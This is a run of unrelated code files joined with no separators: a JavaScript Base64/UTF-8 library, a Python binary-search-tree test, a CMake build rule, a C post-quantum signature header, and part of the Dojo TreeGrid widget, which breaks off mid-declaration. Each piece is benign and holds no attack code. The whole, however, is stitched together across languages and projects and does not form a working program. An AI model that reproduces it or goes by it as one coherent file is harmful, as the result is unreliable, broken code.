/* /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
charset = shift_jis
+++ Base64 Encode / Decode +++
LastModified : 2006-11-08
Powered by kerry
http://202.248.69.143/~goma/
Supported browsers :: IE4+ , NN4.06+ , Gecko , Opera6+
* [RFC 2045] Multipurpose Internet Mail Extensions
(MIME) Part One:
Format of Internet Message Bodies
ftp://ftp.isi.edu/in-notes/rfc2045.txt
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
* Usage:
// Encode
b64_string = base64.encode( my_data [, strMode] );
// Decode
my_data = base64.decode( b64_string [, strMode] );
strMode -> pass 1 when the input data is a string
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ */
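// Example (a sketch, not from the original usage notes): round-tripping a
// string with strMode = 1, which treats the input/output as text rather
// than a byte array:
//   var b64 = base64.encode("Hello", 1); // -> "SGVsbG8="
//   var str = base64.decode(b64, 1);     // -> "Hello"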
base64 = new function()
{
var utfLibName = "utf";
var b64char = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var b64encTable = b64char.split("");
var b64decTable = [];
for (var i=0; i<b64char.length; i++) b64decTable[b64char.charAt(i)] = i;
this.encode = function(_dat, _strMode)
{
return encoder( _strMode? unpackUTF8(_dat): unpackChar(_dat) );
}
var encoder = function(_ary)
{
var md = _ary.length % 3;
var b64 = "";
var i, tmp = 0;
if (md) for (i=3-md; i>0; i--) _ary[_ary.length] = 0;
for (i=0; i<_ary.length; i+=3)
{
tmp = (_ary[i]<<16) | (_ary[i+1]<<8) | _ary[i+2];
b64 += b64encTable[ (tmp >>>18) & 0x3f]
+ b64encTable[ (tmp >>>12) & 0x3f]
+ b64encTable[ (tmp >>> 6) & 0x3f]
+ b64encTable[ tmp & 0x3f];
}
if (md) // replace the 0x0 bytes padded on to reach a multiple of 3 with "="
{
md = 3- md;
b64 = b64.substr(0, b64.length- md);
while (md--) b64 += "=";
}
return b64;
}
this.decode = function(_b64, _strMode)
{
var tmp = decoder( _b64 );
return _strMode? packUTF8(tmp): packChar(tmp);
}
var decoder = function(_b64)
{
_b64 = _b64.replace(/[^A-Za-z0-9\+\/]/g, "");
var md = _b64.length % 4;
var j, i, tmp;
var dat = [];
// the replace above also strips "="; pad with 0x0 ("A") in its place
if (md) for (i=0; i<4-md; i++) _b64 += "A";
for (j=i=0; i<_b64.length; i+=4, j+=3)
{
tmp = (b64decTable[_b64.charAt( i )] <<18)
| (b64decTable[_b64.charAt(i+1)] <<12)
| (b64decTable[_b64.charAt(i+2)] << 6)
| b64decTable[_b64.charAt(i+3)];
dat[ j ] = tmp >>> 16;
dat[j+1] = (tmp >>> 8) & 0xff;
dat[j+2] = tmp & 0xff;
}
// trim the bytes that correspond to the padded 0x0s
if (md) dat.length -= [0,0,2,1][md];
return dat;
}
var packUTF8 = function(_x){ return window[utfLibName].packUTF8(_x) };
var unpackUTF8 = function(_x){ return window[utfLibName].unpackUTF8(_x) };
var packChar = function(_x){ return window[utfLibName].packChar(_x) };
var unpackChar = function(_x){ return window[utfLibName].unpackChar(_x) };
}
/* /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
charset = shift_jis
+++ UTF8/16 Library +++
LastModified : 2006-10-16
Powered by kerry
http://202.248.69.143/~goma/
Supported browsers :: IE4+ , NN4.06+ , Gecko , Opera6+
* [RFC 2279] UTF-8, a transformation format of ISO 10646
ftp://ftp.isi.edu/in-notes/rfc2279.txt
* [RFC 1738] Uniform Resource Locators (URL)
ftp://ftp.isi.edu/in-notes/rfc1738.txt
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Usage:
// Convert a string to UTF16 (character codes)
utf16code_array = utf.unpackUTF16( my_string );
// Convert a string to UTF8 (character codes)
utf8code_array = utf.unpackUTF8( my_string );
// Convert UTF8 (character codes) back to a string; reverses utf.unpackUTF8()
my_string = utf.packUTF8( utf8code_array );
// Convert UTF8/16 (character codes) to a string
my_string = utf.packChar( utfCode_array );
// Convert UTF16 (character codes) to UTF8 (character codes)
utf8code_array = utf.toUTF8( utf16code_array );
// Convert UTF8 (character codes) to UTF16 (character codes)
utf16code_array = utf.toUTF16( utf8code_array );
// Encode to a URL string
url_string = utf.URLencode( my_string );
// Decode from a URL string
my_string = utf.URLdecode( url_string );
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ */
utf = new function()
{
this.unpackUTF16 = function(_str)
{
var i, utf16=[];
for (i=0; i<_str.length; i++) utf16[i] = _str.charCodeAt(i);
return utf16;
}
this.unpackChar = function(_str)
{
var utf16 = this.unpackUTF16(_str);
var i,n, tmp = [];
for (n=i=0; i<utf16.length; i++) {
if (utf16[i]<=0xff) tmp[n++] = utf16[i];
else {
tmp[n++] = utf16[i] >> 8;
tmp[n++] = utf16[i] & 0xff;
}
}
return tmp;
}
this.packChar =
this.packUTF16 = function(_utf16)
{
var i, str = "";
for (i in _utf16) str += String.fromCharCode(_utf16[i]);
return str;
}
this.unpackUTF8 = function(_str)
{
return this.toUTF8( this.unpackUTF16(_str) );
}
this.packUTF8 = function(_utf8)
{
return this.packUTF16( this.toUTF16(_utf8) );
}
this.toUTF8 = function(_utf16)
{
var utf8 = [];
var idx = 0;
var i, j, c;
for (i=0; i<_utf16.length; i++)
{
c = _utf16[i];
if (c <= 0x7f) utf8[idx++] = c;
else if (c <= 0x7ff)
{
utf8[idx++] = 0xc0 | (c >>> 6 );
utf8[idx++] = 0x80 | (c & 0x3f);
}
else if (c <= 0xffff)
{
utf8[idx++] = 0xe0 | (c >>> 12 );
utf8[idx++] = 0x80 | ((c >>> 6 ) & 0x3f);
utf8[idx++] = 0x80 | (c & 0x3f);
}
else
{
j = 4;
while (c >> (6*j)) j++;
utf8[idx++] = ((0xff00 >>> j) & 0xff) | (c >>> (6*--j) );
while (j--)
utf8[idx++] = 0x80 | ((c >>> (6*j)) & 0x3f);
}
}
return utf8;
}
this.toUTF16 = function(_utf8)
{
var utf16 = [];
var idx = 0;
var i,s;
for (i=0; i<_utf8.length; i++, idx++)
{
if (_utf8[i] <= 0x7f) utf16[idx] = _utf8[i];
else
{
if ( (_utf8[i]>>5) == 0x6)
{
utf16[idx] = ( (_utf8[i] & 0x1f) << 6 )
| ( _utf8[++i] & 0x3f );
}
else if ( (_utf8[i]>>4) == 0xe)
{
utf16[idx] = ( (_utf8[i] & 0xf) << 12 )
| ( (_utf8[++i] & 0x3f) << 6 )
| ( _utf8[++i] & 0x3f );
}
else
{
s = 1;
while (_utf8[i] & (0x20 >>> s) ) s++;
utf16[idx] = _utf8[i] & (0x1f >>> s);
while (s-->=0) utf16[idx] = (utf16[idx] << 6) ^ (_utf8[++i] & 0x3f);
}
}
}
return utf16;
}
this.URLencode = function(_str)
{
return _str.replace(/([^a-zA-Z0-9_\-\.])/g, function(_tmp, _c)
{
if (_c == "\x20") return "+";
var tmp = utf.toUTF8( [_c.charCodeAt(0)] );
var c = "";
for (var i in tmp)
{
i = tmp[i].toString(16);
if (i.length == 1) i = "0"+ i;
c += "%"+ i;
}
return c;
} );
}
this.URLdecode = function(_dat)
{
_dat = _dat.replace(/\+/g, "\x20");
_dat = _dat.replace( /%([a-fA-F0-9][a-fA-F0-9])/g,
function(_tmp, _hex){ return String.fromCharCode( parseInt(_hex, 16) ) } );
return this.packChar( this.toUTF16( this.unpackUTF16(_dat) ) );
}
}
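// Example (a sketch): URLencode percent-escapes the UTF-8 bytes of non-ASCII
// characters and turns spaces into "+"; URLdecode reverses both steps:
//   utf.URLencode("café au lait");       // -> "caf%c3%a9+au+lait"
//   utf.URLdecode("caf%c3%a9+au+lait");  // -> "café au lait"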
from binary_tree_prototype import BinaryTreeNode


# @include
def pair_includes_ancestor_and_descendant_of_m(possible_anc_or_desc_0,
                                               possible_anc_or_desc_1, middle):
    search_0, search_1 = possible_anc_or_desc_0, possible_anc_or_desc_1
    # Perform interleaved searching from possible_anc_or_desc_0 and
    # possible_anc_or_desc_1 for middle.
    while (search_0 is not possible_anc_or_desc_1 and search_0 is not middle and
           search_1 is not possible_anc_or_desc_0 and search_1 is not middle and
           (search_0 or search_1)):
        if search_0:
            search_0 = (search_0.left if search_0.data >
                        middle.data else search_0.right)
        if search_1:
            search_1 = (search_1.left if search_1.data >
                        middle.data else search_1.right)

    # If both searches were unsuccessful, or we got from
    # possible_anc_or_desc_0 to possible_anc_or_desc_1 without seeing middle,
    # or from possible_anc_or_desc_1 to possible_anc_or_desc_0 without seeing
    # middle, middle cannot lie between possible_anc_or_desc_0 and
    # possible_anc_or_desc_1.
    if ((search_0 is not middle and search_1 is not middle) or
            search_0 is possible_anc_or_desc_1 or
            search_1 is possible_anc_or_desc_0):
        return False

    def search_target(source, target):
        while source and source is not target:
            source = source.left if source.data > target.data else source.right
        return source is target

    # If we get here, we already know one of possible_anc_or_desc_0 or
    # possible_anc_or_desc_1 has a path to middle. Check if middle has a path
    # to possible_anc_or_desc_1 or to possible_anc_or_desc_0.
    return search_target(
        middle,
        possible_anc_or_desc_1 if search_0 is middle else possible_anc_or_desc_0)
# @exclude


def small_test():
    root = BinaryTreeNode(5)
    assert not pair_includes_ancestor_and_descendant_of_m(root, root, root)
    root.left = BinaryTreeNode(2)
    root.left.right = BinaryTreeNode(4)
    assert not pair_includes_ancestor_and_descendant_of_m(root, root.left,
                                                          root.left.right)
    assert pair_includes_ancestor_and_descendant_of_m(root, root.left.right,
                                                      root.left)
    # Example of the first figure of BST chapter.
    root = BinaryTreeNode(19)
    root.left = BinaryTreeNode(7)
    root.left.left = BinaryTreeNode(3)
    root.left.left.left = BinaryTreeNode(2)
    root.left.left.right = BinaryTreeNode(5)
    root.left.right = BinaryTreeNode(11)
    root.left.right.right = BinaryTreeNode(17)
    root.left.right.right.left = BinaryTreeNode(13)
    root.right = BinaryTreeNode(43)
    root.right.left = BinaryTreeNode(23)
    root.right.left.right = BinaryTreeNode(37)
    root.right.left.right.left = BinaryTreeNode(29)
    root.right.left.right.left.right = BinaryTreeNode(31)
    root.right.left.right.right = BinaryTreeNode(41)
    root.right.right = BinaryTreeNode(47)
    root.right.right.right = BinaryTreeNode(53)
    assert not pair_includes_ancestor_and_descendant_of_m(root.right, root.left,
                                                          root.right.left)
    assert pair_includes_ancestor_and_descendant_of_m(
        root, root.right.left.right.left.right, root.right.left)


def main():
    small_test()
    #      3
    #    2   5
    #  1    4   6
    root = BinaryTreeNode(3)
    root.left = BinaryTreeNode(2)
    root.left.left = BinaryTreeNode(1)
    root.right = BinaryTreeNode(5)
    root.right.left = BinaryTreeNode(4)
    root.right.right = BinaryTreeNode(6)
    assert pair_includes_ancestor_and_descendant_of_m(root, root.right.right,
                                                      root.right)
    assert pair_includes_ancestor_and_descendant_of_m(root.right.right, root,
                                                      root.right)
    assert not pair_includes_ancestor_and_descendant_of_m(root, root.right,
                                                          root.right.right)
    assert not pair_includes_ancestor_and_descendant_of_m(root.right, root,
                                                          root.right.right)
    assert (not pair_includes_ancestor_and_descendant_of_m(
        root.right.left, root.right.right, root.right))
    assert (not pair_includes_ancestor_and_descendant_of_m(
        root.right.left, root.left.left, root.right))


if __name__ == '__main__':
    main()
add_definitions(-DUSE_WINE_TODOS)
add_executable(qedit_winetest mediadet.c timeline.c testlist.c qedit.rc)
set_module_type(qedit_winetest win32cui)
add_importlibs(qedit_winetest oleaut32 ole32 msvcrt kernel32)
add_rostests_file(TARGET qedit_winetest)
#ifndef PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDRESS_H
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDRESS_H
#include <stdint.h>
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_WOTS 0
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_WOTSPK 1
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_HASHTREE 2
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_FORSTREE 3
#define PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_FORSPK 4
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_addr_to_bytes(
unsigned char *bytes, const uint32_t addr[8]);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_layer_addr(
uint32_t addr[8], uint32_t layer);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_tree_addr(
uint32_t addr[8], uint64_t tree);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_type(
uint32_t addr[8], uint32_t type);
/* Copies the layer and tree part of one address into the other */
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_copy_subtree_addr(
uint32_t out[8], const uint32_t in[8]);
/* These functions are used for WOTS and FORS addresses. */
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_keypair_addr(
uint32_t addr[8], uint32_t keypair);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_chain_addr(
uint32_t addr[8], uint32_t chain);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_hash_addr(
uint32_t addr[8], uint32_t hash);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_copy_keypair_addr(
uint32_t out[8], const uint32_t in[8]);
/* These functions are used for all hash tree addresses (including FORS). */
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_tree_height(
uint32_t addr[8], uint32_t tree_height);
void PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_tree_index(
uint32_t addr[8], uint32_t tree_index);
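/* Usage sketch (illustrative only, not part of this header): build the
 * address of hash node 3 in chain 2 of WOTS keypair 7, then serialize it.
 * The 32-byte output size (8 x uint32_t) is an assumption here.
 *
 *   uint32_t addr[8] = {0};
 *   unsigned char bytes[32];
 *   PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_type(
 *       addr, PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_ADDR_TYPE_WOTS);
 *   PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_keypair_addr(addr, 7);
 *   PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_chain_addr(addr, 2);
 *   PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_set_hash_addr(addr, 3);
 *   PQCLEAN_SPHINCSSHAKE256192SSIMPLE_CLEAN_addr_to_bytes(bytes, addr);
 */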
#endif
define([
"dojo/_base/kernel",
"../main",
"dojo/_base/declare",
"dojo/_base/array",
"dojo/_base/lang",
"dojo/_base/event",
"dojo/dom-attr",
"dojo/dom-class",
"dojo/query",
"dojo/keys",
"dijit/tree/ForestStoreModel",
"./DataGrid",
"./_Layout",
"./_FocusManager",
"./_RowManager",
"./_EditManager",
"./TreeSelection",
"./cells/tree",
"./_TreeView"
], function(dojo, dojox, declare, array, lang, event, domAttr, domClass, query, keys, ForestStoreModel,
DataGrid, _Layout, _FocusManager, _RowManager, _EditManager, TreeSelection, TreeCell){
dojo.experimental("dojox.grid.TreeGrid");
var _TreeAggregator = declare("dojox.grid._TreeAggregator", null, {
cells: [],
grid: null,
childFields: [],
constructor: function(kwArgs){
this.cells = kwArgs.cells || [];
this.childFields = kwArgs.childFields || [];
this.grid = kwArgs.grid;
this.store = this.grid.store;
},
_cacheValue: function(cache, id, value){
cache[id] = value;
return value;
},
clearSubtotalCache: function(){
// summary:
// Clears the subtotal cache so that we are forced to recalc it
// (or reread it) again. This is needed, for example, when
// column order is changed.
if(this.store){
delete this.store._cachedAggregates;
}
},
cnt: function(cell, level, item){
// summary:
// calculates the count of the children of item at the given level
var total = 0;
var store = this.store;
var childFields = this.childFields;
if(childFields[level]){
var children = store.getValues(item, childFields[level]);
if (cell.index <= level + 1){
total = children.length;
}else{
array.forEach(children, function(c){
total += this.getForCell(cell, level + 1, c, "cnt");
}, this);
}
}else{
total = 1;
}
return total;
},
sum: function(cell, level, item){
// summary:
// calculates the sum of the children of item at the given level
var total = 0;
var store = this.store;
var childFields = this.childFields;
if(childFields[level]){
array.forEach(store.getValues(item, childFields[level]), function(c){
total += this.getForCell(cell, level + 1, c, "sum");
}, this);
}else{
total += store.getValue(item, cell.field);
}
return total;
},
value: function(cell, level, item){
// summary:
// Empty function so that we can set "aggregate='value'" to
// force loading from the data - and bypass calculating
},
getForCell: function(cell, level, item, type){
// summary:
// Gets the value of the given cell at the given level and type.
// type can be one of "sum", "cnt", or "value". If itemAggregates
// is set and can be used, it is used instead. Values are also
// cached to prevent calculating them too often.
var store = this.store;
if(!store || !item || !store.isItem(item)){ return ""; }
var storeCache = store._cachedAggregates = store._cachedAggregates || {};
var id = store.getIdentity(item);
var itemCache = storeCache[id] = storeCache[id] || [];
if(!cell.getOpenState){
cell = this.grid.getCell(cell.layoutIndex + level + 1);
}
var idx = cell.index;
var idxCache = itemCache[idx] = itemCache[idx] || {};
type = (type || (cell.parentCell ? cell.parentCell.aggregate : "sum"))||"sum";
var attr = cell.field;
if(attr == store.getLabelAttributes()[0]){
// If our attribute is one of the label attributes, we should
// use cnt instead (since it makes no sense to do a sum of labels)
type = "cnt";
}
var typeCache = idxCache[type] = idxCache[type] || [];
// See if we have it in our cache immediately for easy returning
if(typeCache[level] != undefined){
return typeCache[level];
}
// See if they have specified a valid field
var field = ((cell.parentCell && cell.parentCell.itemAggregates) ?
cell.parentCell.itemAggregates[cell.idxInParent] : "")||"";
if(field && store.hasAttribute(item, field)){
return this._cacheValue(typeCache, level, store.getValue(item, field));
}else if(field){
return this._cacheValue(typeCache, level, 0);
}
// Calculate it
return this._cacheValue(typeCache, level, this[type](cell, level, item));
}
});
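// Example (a sketch): with childFields of ["children"], calling
// grid.aggregator.getForCell(cell, 0, item, "sum") totals cell.field across
// item's descendants (recursing through each level's child field); "cnt"
// counts the leaf rows instead, and "value" skips calculation so the result
// comes straight from the data (via itemAggregates).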
var _TreeLayout = declare("dojox.grid._TreeLayout", _Layout, {
// Whether or not we are collapsable - this is calculated when we
// set our structure.
_isCollapsable: false,
_getInternalStructure: function(inStructure){
// Create a "Tree View" with 1 row containing references for
// each column (recursively)
var g = this.grid;
var s = inStructure;
var cells = s[0].cells[0];
var tree = {
type: "dojox.grid._TreeView",
cells: [[]]
};
var cFields = [];
var maxLevels = 0;
var getTreeCells = function(parentCell, level){
var children = parentCell.children;
var cloneTreeCell = function(originalCell, idx){
var k, n = {};
for(k in originalCell){
n[k] = originalCell[k];
}
n = lang.mixin(n, {
level: level,
idxInParent: level > 0 ? idx : -1,
parentCell: level > 0 ? parentCell : null
});
return n;
};
var ret = [];
array.forEach(children, function(c, idx){
if("children" in c){
cFields.push(c.field);
var last = ret[ret.length - 1];
last.isCollapsable = true;
c.level = level;
ret = ret.concat(getTreeCells(c, level + 1));
}else{
ret.push(cloneTreeCell(c, idx));
}
});
maxLevels = Math.max(maxLevels, level);
return ret;
};
var tCell = {children: cells, itemAggregates: []};
tree.cells[0] = getTreeCells(tCell, 0);
g.aggregator = new _TreeAggregator({cells: tree.cells[0],
grid: g,
childFields: cFields});
if(g.scroller && g.defaultOpen){
g.scroller.defaultRowHeight = g.scroller._origDefaultRowHeight * (2 * maxLevels + 1);
}
return [ tree ];
},
setStructure: function(inStructure){
// Mangle the structure a bit and make it work as desired
var s = inStructure;
var g = this.grid;
// Only supporting single-view, single row or else we
// are not collapsable
if(g && g.treeModel && !array.every(s, function(i){
return ("cells" in i);
})){
s = arguments[0] = [{cells:[s]}];
}
if(s.length == 1 && s[0].cells.length == 1){
if(g && g.treeModel){
s[0].type = "dojox.grid._TreeView";
this._isCollapsable = true;
s[0].cells[0][(this.grid.treeModel?this.grid.expandoCell:0)].isCollapsable = true;
}else{
var childCells = array.filter(s[0].cells[0], function(c){
return ("children" in c);
});
if(childCells.length === 1){
this._isCollapsable = true;
}
}
}
if(this._isCollapsable && (!g || !g.treeModel)){
arguments[0] = this._getInternalStructure(s);
}
this.inherited(arguments);
},
addCellDef: function(inRowIndex, inCellIndex, inDef){
var obj = this.inherited(arguments);
return lang.mixin(obj, TreeCell);
}
});
var TreePath = declare("dojox.grid.TreePath", null, {
level: 0,
_str: "",
_arr: null,
grid: null,
store: null,
cell: null,
constructor: function(/*String|Integer[]|Integer|dojox.grid.TreePath*/ path, /*dojox.grid.TreeGrid*/ grid){
if(lang.isString(path)){
this._str = path;
this._arr = array.map(path.split('/'), function(item){ return parseInt(item, 10); });
}else if(lang.isArray(path)){
this._str = path.join('/');
this._arr = path.slice(0);
}else if(typeof path == "number"){
this._str = String(path);
this._arr = [path];
}else{
this._str = path._str;
this._arr = path._arr.slice(0);
}
this.level = this._arr.length-1;
this.grid = grid;
this.store = this.grid.store;
if(grid.treeModel){
this.cell = grid.layout.cells[grid.expandoCell];
}else{
this.cell = grid.layout.cells[this.level];
}
},
item: function(){
// summary:
// gets the dojo.data item associated with this path
if(!this._item){
this._item = this.grid.getItem(this._arr);
}
return this._item;
},
compare: function(path /*dojox.grid.TreePath|String|Array*/){
// summary:
// compares two paths
if(lang.isString(path) || lang.isArray(path)){
if(this._str == path){ return 0; }
if(path.join && this._str == path.join('/')){ return 0; }
path = new TreePath(path, this.grid);
}else if(path instanceof TreePath){
if(this._str == path._str){ return 0; }
}
for(var i=0, l=(this._arr.length < path._arr.length ? this._arr.length : path._arr.length); i<l; i++){
if(this._arr[i]<path._arr[i]){ return -1; }
if(this._arr[i]>path._arr[i]){ return 1; }
}
if(this._arr.length<path._arr.length){ return -1; }
if(this._arr.length>path._arr.length){ return 1; }
return 0;
},
isOpen: function(){
// summary:
// Returns the open state of this cell.
return this.cell.openStates && this.cell.getOpenState(this.item());
},
previous: function(){
// summary:
// Returns the path that is before this path in the
// grid. If no path is found, returns null.
var new_path = this._arr.slice(0);
if(this._str == "0"){
return null;
}
var last = new_path.length-1;
if(new_path[last] === 0){
new_path.pop();
return new TreePath(new_path, this.grid);
}
new_path[last]--;
var path = new TreePath(new_path, this.grid);
return path.lastChild(true);
},
next: function(){
// summary:
// Returns the next path in the grid. If no path
// is found, returns null.
var new_path = this._arr.slice(0);
if(this.isOpen()){
new_path.push(0);
}else{
new_path[new_path.length-1]++;
for(var i=this.level; i>=0; i--){
var item = this.grid.getItem(new_path.slice(0, i+1));
if(i>0){
if(!item){
new_path.pop();
new_path[i-1]++;
}
}else{
if(!item){
return null;
}
}
}
}
return new TreePath(new_path, this.grid);
},
children: function(alwaysReturn){
// summary:
// Returns the child data items of this row. If this
// row isn't open and alwaysReturn is falsey, returns null.
if(!this.isOpen()&&!alwaysReturn){
return null;
}
var items = [];
var model = this.grid.treeModel;
if(model){
var item = this.item();
var store = model.store;
if(!model.mayHaveChildren(item)){
return null;
}
array.forEach(model.childrenAttrs, function(attr){
items = items.concat(store.getValues(item, attr));
});
}else{
items = this.store.getValues(this.item(), this.grid.layout.cells[this.cell.level+1].parentCell.field);
if(items.length>1&&this.grid.sortChildItems){
var sortProps = this.grid.getSortProps();
if(sortProps&&sortProps.length){
var attr = sortProps[0].attribute,
grid = this.grid;
if(attr&&items[0][attr]){
var desc = !!sortProps[0].descending;
items = items.slice(0); // don't touch the array in the store, make a copy
items.sort(function(a, b){
return grid._childItemSorter(a, b, attr, desc);
});
}
}
}
}
return items;
},
childPaths: function(){
var childItems = this.children();
if(!childItems){
return [];
}
return array.map(childItems, function(item, index){
return new TreePath(this._str + '/' + index, this.grid);
}, this);
},
parent: function(){
// summary:
// Returns the parent path of this path. If this is a
// top-level row, returns null.
if(this.level === 0){
return null;
}
return new TreePath(this._arr.slice(0, this.level), this.grid);
},
lastChild: function(/*Boolean?*/ traverse){
// summary:
// Returns the last child row below this path. If traverse
// is true, will traverse down to find the last child row
// of this branch. If there are no children, returns itself.
var children = this.children();
if(!children || !children.length){
return this;
}
var path = new TreePath(this._str + "/" + String(children.length-1), this.grid);
if(!traverse){
return path;
}
return path.lastChild(true);
},
toString: function(){
return this._str;
}
});
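// Example (a sketch): a TreePath addresses a row by its 0-based position at
// each nesting level, so new TreePath("1/3/2", grid) is the 3rd child of the
// 4th child of the 2nd top-level item; path.next()/path.previous() walk rows
// in display order, and path.parent() climbs one level.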
var _TreeFocusManager = declare("dojox.grid._TreeFocusManager", _FocusManager, {
setFocusCell: function(inCell, inRowIndex){
if(inCell && inCell.getNode(inRowIndex)){
this.inherited(arguments);
}
},
isLastFocusCell: function(){
if(this.cell && this.cell.index == this.grid.layout.cellCount-1){
var path = new TreePath(this.grid.rowCount-1, this.grid);
path = path.lastChild(true);
return this.rowIndex == path._str;
}
return false;
},
next: function(){
// summary:
// focus next grid cell
if(this.cell){
var row=this.rowIndex, col=this.cell.index+1, cc=this.grid.layout.cellCount-1;
var path = new TreePath(this.rowIndex, this.grid);
if(col > cc){
var new_path = path.next();
if(!new_path){
col--;
}else{
col = 0;
path = new_path;
}
}
if(this.grid.edit.isEditing()){ //when editing, only navigate to editable cells
var nextCell = this.grid.getCell(col);
if (!this.isLastFocusCell() && !nextCell.editable){
this._focusifyCellNode(false);
this.cell=nextCell;
this.rowIndex=path._str;
this.next();
return;
}
}
this.setFocusIndex(path._str, col);
}
},
previous: function(){
// summary:
// focus previous grid cell
if(this.cell){
var row=(this.rowIndex || 0), col=(this.cell.index || 0) - 1;
var path = new TreePath(row, this.grid);
if(col < 0){
var new_path = path.previous();
if(!new_path){
col = 0;
}else{
col = this.grid.layout.cellCount-1;
path = new_path;
}
}
if(this.grid.edit.isEditing()){ //when editing, only navigate to editable cells
var prevCell = this.grid.getCell(col);
if (!this.isFirstFocusCell() && !prevCell.editable){
this._focusifyCellNode(false);
this.cell=prevCell;
this.rowIndex=path._str;
this.previous();
return;
}
}
this.setFocusIndex(path._str, col);
}
},
move: function(inRowDelta, inColDelta){
if(this.isNavHeader()){
this.inherited(arguments);
return;
}
if(!this.cell){ return; }
// Handle grid proper.
var sc = this.grid.scroller,
r = this.rowIndex,
rc = this.grid.rowCount-1,
path = new TreePath(this.rowIndex, this.grid);
if(inRowDelta){
var row;
if(inRowDelta>0){
path = path.next();
row = path._arr[0];
if(row > sc.getLastPageRow(sc.page)){
//need to load additional data, let scroller do that
this.grid.setScrollTop(this.grid.scrollTop+sc.findScrollTop(row)-sc.findScrollTop(r));
}
}else if(inRowDelta<0){
path = path.previous();
row = path._arr[0];
if(row <= sc.getPageRow(sc.page)){
//need to load additional data, let scroller do that
this.grid.setScrollTop(this.grid.scrollTop-sc.findScrollTop(r)-sc.findScrollTop(row));
}
}
}
var cc = this.grid.layout.cellCount-1,
i = this.cell.index,
col = Math.min(cc, Math.max(0, i+inColDelta));
var cell = this.grid.getCell(col);
var colDir = inColDelta < 0 ? -1 : 1;
while(col>=0 && col < cc && cell && cell.hidden === true){
// skip hidden cells
col += colDir;
cell = this.grid.getCell(col);
}
if (!cell || cell.hidden === true){
// don't change col if would move to hidden
col = i;
}
if(inRowDelta){
this.grid.updateRow(r);
}
this.setFocusIndex(path._str, col);
}
});
var TreeGrid = declare("dojox.grid.TreeGrid", DataGrid, {
// summary:
// A grid that supports nesting rows - it provides an expando function
// similar to dijit.Tree. It also provides mechanisms for aggregating
// the values of subrows
// description:
// TreeGrid currently only works on "simple" structures. That is,
// single-view structures with a single row in them.
//
// The TreeGrid works using the concept of "levels" - level 0 are the
// top-level items.
// defaultOpen: Boolean
// Whether or not we default to open (all levels). This defaults to
// false for grids with a treeModel.
defaultOpen: true,
// sortChildItems: Boolean
// If true, child items will be returned sorted according to the sorting
// properties of the grid.
sortChildItems: false,
// openAtLevels: Array
// Which levels we are open at (overrides defaultOpen for the values
// that exist here). Its values can be a boolean (true/false) or an
// integer (for the # of children to be closed if there are more than
// that)
openAtLevels: [],
// treeModel: dijit.tree.ForestStoreModel
// A dijit.Tree model that will be used instead of using aggregates.
// Setting this value will make the TreeGrid behave like a columnar
// tree. When setting this value, defaultOpen will default to false,
// and openAtLevels will be ignored.
treeModel: null,
// expandoCell: Integer
// When used in conjunction with a treeModel (see above), this is a 0-based
// index of the cell in which to place the actual expando
expandoCell: 0,
// aggregator: Object
// The aggregator class - it will be populated automatically if we
// are a collapsible grid
aggregator: null,
// Override this to get our "magic" layout
_layoutClass: _TreeLayout,
createSelection: function(){
this.selection = new TreeSelection(this);
},
_childItemSorter: function(a, b, attribute, descending){
var av = this.store.getValue(a, attribute);
var bv = this.store.getValue(b, attribute);
if(av != bv){
return av < bv == descending ? 1 : -1;
}
return 0;
},
_onNew: function(item, parentInfo){
if(!parentInfo || !parentInfo.item){
this.inherited(arguments);
}else{
var idx = this.getItemIndex(parentInfo.item);
if(typeof idx == "string"){
this.updateRow(idx.split('/')[0]);
}else if(idx > -1){
this.updateRow(idx);
}
}
},
_onSet: function(item, attribute, oldValue, newValue){
this._checkUpdateStatus();
if(this.aggregator){
this.aggregator.clearSubtotalCache();
}
var idx = this.getItemIndex(item);
if(typeof idx == "string"){
this.updateRow(idx.split('/')[0]);
}else if(idx > -1){
this.updateRow(idx);
}
},
_onDelete: function(item){
this._cleanupExpandoCache(this._getItemIndex(item, true), this.store.getIdentity(item), item);
this.inherited(arguments);
},
